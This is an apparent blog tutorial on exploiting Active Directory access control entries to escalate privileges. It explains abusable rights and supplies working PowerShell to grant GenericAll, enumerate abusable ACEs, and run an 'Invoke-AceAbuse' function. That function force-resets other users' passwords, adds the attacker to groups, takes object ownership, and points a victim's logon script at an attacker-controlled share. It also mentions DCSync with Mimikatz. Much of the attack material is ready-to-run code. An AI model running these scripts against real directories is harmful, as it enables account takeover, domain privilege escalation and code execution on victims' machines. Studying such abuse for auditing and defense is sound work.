What is Access Control List (ACL) and How to exploit it in Active Directory?

by FOUNDER
October 13, 2024
Reading Time: 6 mins read

Active Directory ACL

When we talk about ACL-based attacks, we are specifically referring to Access Control Entries (ACEs) which populate Discretionary Access Control Lists (DACLs). DACLs reside within security descriptors, which reside within securable objects. Active Directory users, groups, and computers are securable objects. Access Control Entries describe the allowed and denied permissions for other principals in Active Directory against the securable object.

[Image: security descriptor of the user “Jeff Dimmock”, with the DACL highlighted]
Above: The graphical representation of the security descriptor for the user “Jeff Dimmock”. Highlighted in red is the Discretionary Access Control List (DACL), comprised of Access Control Entries (ACEs).

The best example of this is when one object has “full control” over another object. Consider the “Domain Admins” group, for example. It makes sense that the “Domain Admins” group would have full control over every other object in a domain:

[Image: DACL of the “Jeff Dimmock” user, with the Domain Admins ACE highlighted]
Above: The ACE granting the “Domain Admins” group full control of the “Jeff Dimmock” user is highlighted in red.

Now, of course, the Domain Admins group has full control of every other object in Active Directory; as attackers, however, we are interested in ACEs that let a principal we already control take over a domain admin, or a user or group that brings us closer to our target objective. Additionally, the owner of an object is implicitly granted READ_CONTROL and WRITE_DAC on it regardless of the explicit ACEs in its DACL (unless an OWNER RIGHTS ACE restricts the owner), so an owner can always rewrite the DACL to grant themselves full control. In practice, owning an object is equivalent to holding GenericAll over it.

Common ACEs Abused in Active Directory

  • ForceChangePassword: The ability to reset the target user’s password without knowing the current value (the User-Force-Change-Password extended right). Abused with Set-DomainUserPassword in PowerView, or Set-ADAccountPassword -Reset in the ActiveDirectory module.
  • AddMember: The ability to add arbitrary users, groups, or computers to the target group (WriteProperty on the group’s member attribute). Abused with Add-DomainGroupMember.
  • GenericAll: Full object control, including the ability to add other principals to a group, change a user password without knowing its current value, register an SPN on a user object, etc. Abused with Set-DomainUserPassword or Add-DomainGroupMember.
  • GenericWrite: The ability to update any non-protected attribute of the target object. For example, update the scriptPath attribute of a target user so that the user runs your specified executable/commands the next time they log on. Abused with Set-DomainObject.
  • WriteOwner: The ability to change the owner of the target object. Because the owner is implicitly granted WriteDACL, an attacker who makes a principal they control the owner can then add any ACE they like and manipulate the object as they see fit. Abused with Set-DomainObjectOwner.
  • WriteDACL: The ability to write new ACEs to the target object’s DACL. For example, an attacker may add an ACE granting themselves “full control” (GenericAll) of the target object. Abused with Add-NewADObjectAccessControlEntry or, in current PowerView, Add-DomainObjectAcl.
  • AllExtendedRights: The ability to perform any extended right (control access right) against the object. Force-changing a user’s password (User-Force-Change-Password) and the DS-Replication-Get-Changes rights behind DCSync are examples of extended rights; adding members to a group is not one (it is a write to the member attribute). Abused with Set-DomainUserPassword against a user, or with DCSync (Mimikatz lsadump::dcsync) when held on the domain object.
  • Self (Self-Membership): A validated write on the group’s member attribute that lets a principal add only its own account to the target group. Abused with Add-DomainGroupMember, adding yourself.

How to Grant GenericAll Permission to a User?

To grant GenericAll permission to a user in Active Directory (AD), follow these steps:

  1. Open the Active Directory Users and Computers (ADUC) console.
  2. Navigate to the user account that you want to grant full permission to.
  3. Right-click on the user account and select “Properties”.
  4. In the properties window, go to the “Security” tab.
  5. Click on the “Advanced” button.
  6. In the “Advanced Security Settings” window, click on the “Add” button.
  7. In the “Permission Entry” window, click on “Select a principal”, then click “Advanced”, and finally “Find Now”.
  8. In the “Search” window, find and select the user or group that you want to grant full permission to.
  9. Click “OK” to close the “Search” window.
  10. In the “Permission Entry” window, select “This object and all descendant objects” in the “Applies to” dropdown.
  11. In the “Permissions” section, select “Full control” for the “Allow” permission.
  12. Click “OK” to close the “Permission Entry” window.
  13. Click “OK” to close the “Advanced Security Settings” window.
  14. Click “OK” to close the “Properties” window.

Now, the user or group should have full control permission on the selected user account and all descendant objects in Active Directory.

Note: Use caution when granting this kind of permission and only give it to trusted users or groups.
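The same change, scripted instead of clicked: an added example (not code from the article) using the RSAT ActiveDirectory module and its AD: drive. It assumes the caller already holds WriteDACL on the target (or owns it), and the account names Etta.Dona and Lindi.Bryn are constructed for illustration.

```powershell
# Added example: grant a principal GenericAll ("Full control") over a target object and
# all descendant objects, the same result as the 14 ADUC steps above.
Import-Module ActiveDirectory

function Grant-GenericAll {
    param(
        [Parameter(Mandatory)][string]$TargetSam,     # object whose DACL is edited (e.g. a user)
        [Parameter(Mandatory)][string]$PrincipalSam   # user or group that receives Full control
    )
    $target    = Get-ADObject -Filter "sAMAccountName -eq '$TargetSam'"
    $principal = Get-ADObject -Filter "sAMAccountName -eq '$PrincipalSam'" -Properties objectSid
    $path      = "AD:\" + $target.DistinguishedName

    $acl = Get-Acl -Path $path
    # GenericAll is what the dialog calls "Full control";
    # ActiveDirectorySecurityInheritance::All is "This object and all descendant objects".
    $ace = New-Object System.DirectoryServices.ActiveDirectoryAccessRule(
        $principal.objectSid,
        [System.DirectoryServices.ActiveDirectoryRights]::GenericAll,
        [System.Security.AccessControl.AccessControlType]::Allow,
        [System.DirectoryServices.ActiveDirectorySecurityInheritance]::All)
    $acl.AddAccessRule($ace)
    Set-Acl -Path $path -AclObject $acl

    # Read the DACL back and return the ACE(s) that now grant the principal GenericAll,
    # comparing by SID so the check does not depend on how the name resolves.
    $principalSid = $principal.objectSid.Value
    (Get-Acl -Path $path).Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        $_.ActiveDirectoryRights -eq 'GenericAll' -and
        $_.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value -eq $principalSid
    }
}

# Usage (constructed names): give Lindi.Bryn full control of Etta.Dona and show the new ACE.
# Grant-GenericAll -TargetSam 'Etta.Dona' -PrincipalSam 'Lindi.Bryn' |
#     Format-List IdentityReference, ActiveDirectoryRights, InheritanceType, IsInherited
```

The function returns the ACE it just wrote, so an empty result means Set-Acl did not take effect (typically an "insufficient access rights" error from the DC because the caller lacks WriteDACL on the target).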


How to Check if a User Has GenericAll Permissions (using BloodHound)

  1. Collect the data with SharpHound and import it into BloodHound.
  2. Search for the user whose permissions you want to check.
  3. Click the user node and, in the Node Info panel, expand Transitive Object Control. (First Degree Object Control lists only rights held directly by that user; Transitive Object Control also includes rights that reach the user through group membership.)
  4. Any object the user holds GenericAll over is listed there, with the GenericAll edge drawn on the graph.

In the example below, Lindi.Bryn has GenericAll access over Etta.Dona:

[Image: BloodHound graph showing a GenericAll edge from Lindi.Bryn to Etta.Dona]

Installing the Active Directory PowerShell Module

The Active Directory module for Windows PowerShell is not installed by default on most systems. It ships with the Remote Server Administration Tools (RSAT), which let a Windows client or server manage Windows Server roles and features remotely. Both commands below need an elevated prompt.

On Windows Server:

Add-WindowsFeature RSAT-AD-PowerShell

On Windows 10/11, where RSAT is delivered as a Feature on Demand:

Get-WindowsCapability -Name RSAT.ActiveDirectory* -Online | Add-WindowsCapability -Online


Check if You Have GenericAll or Write Permissions on a User

After importing the Active Directory module in PowerShell, use the following command to test if you can modify a user object:

Import-Module ActiveDirectory
Set-ADUser -Identity Etta.Dona -Description "Test update"

This command attempts to update the description of the user Etta.Dona. If you lack write access to that attribute, the DC rejects the change with an “insufficient access rights” error. If it succeeds, you hold at least WriteProperty on description (commonly through GenericWrite or GenericAll), but success on its own does not prove GenericAll, and the write is visible in the object’s audit trail, so restore the original description afterwards.
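A non-destructive way to answer the same question, and to see exactly which of the ACE types from the list above a given account holds on a target, is to read the target’s DACL and compare each ACE against the SIDs the account carries. The following is an added example (not code from the article) using the RSAT ActiveDirectory module; the GUIDs are the fixed schema values for the User-Force-Change-Password right and the member attribute, and the account names are constructed.

```powershell
# Added example: enumerate a target object's DACL and flag the ACEs an account can abuse.
Import-Module ActiveDirectory

# Rights GUIDs carried by object-specific ACEs (fixed values from the AD schema):
$ForceChangePasswordGuid = [guid]'00299570-246d-11d0-a768-00aa006e0529'  # User-Force-Change-Password extended right
$MemberAttributeGuid     = [guid]'bf9679c0-0de6-11d0-a285-00aa003049e2'  # schemaIDGUID of the "member" attribute

# Map one ACE (rights mask + ObjectType GUID) onto the abuse categories listed earlier.
function Get-AceAbuseLabel {
    param(
        [Parameter(Mandatory)][System.DirectoryServices.ActiveDirectoryRights]$Rights,
        [guid]$ObjectType = [guid]::Empty   # Guid.Empty means the ACE covers the whole object
    )
    $R      = [System.DirectoryServices.ActiveDirectoryRights]
    $mask   = [int]$Rights
    $whole  = ($ObjectType -eq [guid]::Empty)
    $labels = @()

    if (($mask -band [int]$R::GenericAll) -eq [int]$R::GenericAll) { return 'GenericAll' }
    if ($mask -band [int]$R::WriteDacl)  { $labels += 'WriteDacl' }
    if ($mask -band [int]$R::WriteOwner) { $labels += 'WriteOwner' }
    if ($whole -and (($mask -band [int]$R::GenericWrite) -eq [int]$R::GenericWrite)) { $labels += 'GenericWrite' }
    if ($mask -band [int]$R::ExtendedRight) {
        if ($whole)                                       { $labels += 'AllExtendedRights' }
        elseif ($ObjectType -eq $ForceChangePasswordGuid) { $labels += 'ForceChangePassword' }
    }
    # Group membership rights are writes to "member": WriteProperty adds anyone, Self only yourself.
    $onMember = $whole -or ($ObjectType -eq $MemberAttributeGuid)
    if (($mask -band [int]$R::WriteProperty) -and $onMember) { $labels += 'AddMember' }
    if (($mask -band [int]$R::Self)          -and $onMember) { $labels += 'AddSelf' }
    return $labels
}

function Find-AbusableAce {
    param(
        [Parameter(Mandatory)][string]$TargetSam,     # object whose DACL is read (user or group)
        [Parameter(Mandatory)][string]$PrincipalSam   # the account you hold, e.g. the current user
    )
    $target = Get-ADObject -Filter "sAMAccountName -eq '$TargetSam'"
    # SIDs the principal presents: its own, every group it belongs to (tokenGroups is computed
    # by the DC and already resolves nested membership), plus the well-known Everyone and
    # Authenticated Users SIDs, which tokenGroups does not list.
    $principal = Get-ADUser -Identity $PrincipalSam -Properties tokenGroups
    $heldSids  = @($principal.SID.Value, 'S-1-1-0', 'S-1-5-11') +
                 @($principal.tokenGroups | ForEach-Object { $_.Value })

    $acl = Get-Acl -Path ("AD:\" + $target.DistinguishedName)
    foreach ($ace in $acl.Access) {
        # Deny ACEs are skipped here but still matter: a matching Deny overrides an Allow.
        if ($ace.AccessControlType -ne 'Allow') { continue }
        $aceSid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value
        if ($heldSids -notcontains $aceSid) { continue }
        $labels = Get-AceAbuseLabel -Rights $ace.ActiveDirectoryRights -ObjectType $ace.ObjectType
        if (-not $labels) { continue }
        [pscustomobject]@{
            Target     = $target.DistinguishedName
            Principal  = $ace.IdentityReference.Value
            Rights     = $ace.ActiveDirectoryRights
            ObjectType = $ace.ObjectType
            Inherited  = $ace.IsInherited
            Abuse      = ($labels -join ',')
        }
    }
}

# Usage (constructed names, matching the BloodHound example above):
# Find-AbusableAce -TargetSam 'Etta.Dona' -PrincipalSam 'Lindi.Bryn' | Format-Table -AutoSize
```

Because the comparison is done on SIDs, rights granted to a nested group the account belongs to are caught as well, which is what BloodHound’s Transitive Object Control view shows; an ACE that is flagged here but held through an inherited entry (Inherited = True) came from a parent container, so the fix belongs there.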


Change the Password of Another User if You Have GenericAll or ForceChangePassword

To reset the password of another user in Active Directory, you need the User-Force-Change-Password extended right on that user, which GenericAll and AllExtendedRights also include; GenericWrite alone is not enough, because a password reset is a control access right rather than an ordinary attribute write. With sufficient rights, use the following PowerShell command:

Set-ADAccountPassword -Identity 'username' -Reset -NewPassword (ConvertTo-SecureString -AsPlainText "NewPassword" -Force)
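The password reset is one branch of a larger pattern: each ACE type from the list above maps to one specific write, followed by a read-back to confirm it landed. As an added example (not code from the article), the function below drives the non-DACL branches with the RSAT ActiveDirectory module; the account names, the new password and the UNC script path are constructed values, and the WriteOwner branch only takes ownership, after which you add yourself a GenericAll ACE as described under WriteDACL.

```powershell
# Added example: exercise one of the abusable rights against a target and verify the change.
Import-Module ActiveDirectory

function Invoke-AceAbuse {
    param(
        [Parameter(Mandatory)][ValidateSet('ForceChangePassword','AddMember','GenericWrite','WriteOwner')]
        [string]$Right,
        [Parameter(Mandatory)][string]$TargetSam,            # user or group the ACE points at
        [string]$AttackerSam = $env:USERNAME,                # principal that holds the right
        [string]$NewPassword = 'Constructed-Pa55w0rd!',      # constructed value for the reset branch
        [string]$ScriptPath  = '\\attacker\share\logon.bat'  # constructed UNC path for GenericWrite
    )
    switch ($Right) {
        'ForceChangePassword' {
            # -Reset exercises User-Force-Change-Password, so the current password is not needed.
            $secure = ConvertTo-SecureString -AsPlainText $NewPassword -Force
            Set-ADAccountPassword -Identity $TargetSam -Reset -NewPassword $secure
            (Get-ADUser -Identity $TargetSam -Properties PasswordLastSet).PasswordLastSet
        }
        'AddMember' {
            # WriteProperty on "member" lets you add any principal; with only Self-Membership the
            # same cmdlet works, but -Members must be your own account.
            Add-ADGroupMember -Identity $TargetSam -Members $AttackerSam
            Get-ADGroupMember -Identity $TargetSam | Select-Object -ExpandProperty SamAccountName
        }
        'GenericWrite' {
            # scriptPath is an ordinary attribute: the user runs this at their next interactive logon.
            Set-ADUser -Identity $TargetSam -ScriptPath $ScriptPath
            (Get-ADUser -Identity $TargetSam -Properties ScriptPath).ScriptPath
        }
        'WriteOwner' {
            # Make yourself the owner; the owner is implicitly granted WriteDACL, so the next step is
            # to add an ACE giving yourself GenericAll (see the WriteDACL entry above).
            $dn  = (Get-ADObject -Filter "sAMAccountName -eq '$TargetSam'").DistinguishedName
            $acl = Get-Acl -Path "AD:\$dn"
            $acl.SetOwner((Get-ADUser -Identity $AttackerSam).SID)
            Set-Acl -Path "AD:\$dn" -AclObject $acl
            (Get-Acl -Path "AD:\$dn").Owner
        }
    }
}

# Usage (constructed names): Lindi.Bryn resets Etta.Dona's password and checks PasswordLastSet.
# Invoke-AceAbuse -Right ForceChangePassword -TargetSam 'Etta.Dona' -AttackerSam 'Lindi.Bryn'
```

Each branch returns the attribute it changed so a failed write shows up as an unchanged value rather than silently passing; on an engagement, record the original values (the old scriptPath in particular) so they can be restored.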

If you want to read about the Kerberoasting attack, here is the article:

Understanding Kerberoasting: Creation, Exploitation, Impact, and Defense
